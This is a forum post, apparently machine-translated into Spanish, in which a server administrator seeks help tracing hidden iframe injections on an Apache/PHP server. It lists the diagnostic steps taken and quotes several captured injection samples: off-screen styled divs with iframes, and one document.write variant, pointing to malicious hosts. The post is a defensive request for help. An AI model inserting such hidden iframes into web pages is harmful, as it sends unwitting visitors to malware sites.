Hace unos meses, un iFrame oculto comenzó a aparecer en cada página en cada sitio en nuestro servidor dedicado. Cuando bajamos los sitios para mantenimiento con un 503, el iFrame todavía estaba allí en la página de mantenimiento para abajo. Finalmente, el host bloqueó la fuente del iFrame, pero nunca encontramos la puerta trasera. El iFrame inyectado se veía algo así, pero envuelto en una etiqueta de estilo para ofuscar y con varias URL:

iframe src = "http://heusnsy.nl/32283947.html ..

Movimos nuestros sitios más pequeños a un host diferente, y han estado bien.

Trasladamos nuestro sitio principal a un nuevo servidor dedicado en el mismo host y, a pesar de nuestros esfuerzos por bloquear el servidor (firewalls, acceso restringido, actualizaciones de software, inspeccionar cada archivo), el iFrame devolvió.

Hemos buscado en todas partes para saber cómo se está introduciendo (archivos de configuración, htaccess), pero no podemos encontrarlo.

¿Alguna idea de dónde podrían estar las vulnerabilidades ocultas de inyección de iFrame?

Edición: Aquí hay más detalles: Máquina Linux ejecutando Apache y PHP. Últimas versiones de todo. El código que se inyectó se ve así:

<style>.ivx4di91j1 { position:absolute; left:-1418px; top:-1348px} </style> <div class="ivx4di91j1"><iframe src="heusnsy.nl/32283947.html..

Actualización: Aquí hay más información y lo que hemos aprendido:

host: Station CentOS Linux 6.3 - Linux 2.6.32-279.5.1.el6.x86_64 en x86_64 / Apache versión 2.2.15 - PHP 5.3.3 (cli) (construido: 3 de julio de 2012 16:53:21)

El servidor en sí no está comprometido.

Todos los servicios incluidos (apache / php) se actualizan a las últimas versiones disponibles para nuestro sistema.

No se comprometieron cuentas (ftp o de otro tipo).

Malware cambia su URL de destino (iframe src =) simultáneamente en varios sitios infectados. (Cortesía de unmaskparasites.com)

Durante el cambio del objetivo src, no se ejecutaron / ejecutaron procesos no autorizados u ocultos.

TCPDUMP obtuvo el código del malware mientras dejaba fuera del puerto 80 tcp, pero no se encontró nada extraño en la solicitud GET del usuario que recibe el malware; tampoco se encontró nada extraño en los registros de acceso de apache correspondientes.

Los archivos del sitio web o los binarios de httpd / php no se modificaron de ninguna manera durante el cambio de la dirección src url del iFrame - cortesía de md5sum check.

Durante el cambio no se realizaron conexiones ilegales en los puertos conocidos para los servicios conocidos. Firewall se encarga del resto.

rkhunter y maldet no dieron ningún resultado.

Malware iFrame se activa e inyecta justo después de la primera"</script>" etiqueta en cualquier página que tenga esta etiqueta, en todas las cuentas y sitios web de este servidor.

El malware se inyecta en páginas estáticas y en sitios sin conexiones de base de datos. (es suficiente para que la página tenga<head> </script></head> etiquetas)

No se instalaron módulos rogue de apache o módulos php (excluyendo mycript.so). La mayoría de los módulos de apache predeterminados están suspendidos y comentados.

El malware no está constantemente presente. Viene y se va, a veces se apaga durante varias horas y luego aparece para varios usuarios y se apaga nuevamente. Lo que es extremadamente difícil de rastrear.

El 100% de los códigos php y la mayoría de los códigos javascript que se ejecutan en nuestros sitios (excepto el de phpmyadmin) están codificados de forma personalizada. Lo único que no es las librerías Jquery.

El servidor es una máquina de alto tráfico y la búsqueda / coincidencia en los registros es extremadamente lenta. El registro de acceso semanal puede llegar a superar los 15 gb.

Esa es la situación ... Ya no se trata de cuentas comprometidas, archivos pirateados, scripts fraudulentos. Esto es algo más allá de lo que hemos visto hasta ahora y la causa está oculta en algún lugar del propio apache / php. (Al menos esto es lo que pensamos). Cualquier ayuda o ideas son muy apreciadas.

Aquí hay ejemplos de la inyección iFrame:

<script src="/templates/js/jquery-1.4.2.min.js" type="text/javascript"></script><style>.pw0xxs { position:absolute; left:-1795px; top:-1357px} </   style> <div class="pw0xxs"><iframe src="http://infectedsite.com/84064443.html" width="167" height="332"></iframe></div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js" type="text/javascript"></script><style>.h3fuonj6 { position:absolute; left :-1012px; top:-1348px} </style> <div class="h3fuonj6"><iframe src="http://infectedsite.com/13334443.html" width="236" height="564"></iframe></div >

</script><style>.exm31sfk8l { position:absolute; left:-1349px; top:-1836px} </style> <div class="exm31sfk8l"><iframe src="http://infectedsite.com/79144443.html" wid th="559" height="135"></iframe></div> document.write('<style>.exm31sfk8l { position:absolute; left:-1349px; top:-1836px} </style> <div class="exm31sfk8l"><iframe src="http://ksner.pl/79144443.ht ml" width="559" height="135"></iframe></div>');// ColorBox v1.3.19.3 - jQuery lightbox plugin

</script><style>.rv9mlj { position:absolute; left:-1698px; top:-1799px} </style> <div class="rv9mlj"><iframe src="http://infectedsite.com/42054443. html" width="163" height="409"></iframe></div>

<script src="./js/cross_framing_protection.js?ts=1344391602" type="text/javascript"></script><style>.rv9mlj { position:absolute; left:-1698px; top:-1799px}  </style> <div class="rv9mlj"><iframe src="http://infectedsite.com/42054443.html" width="163" height="409"></iframe></div>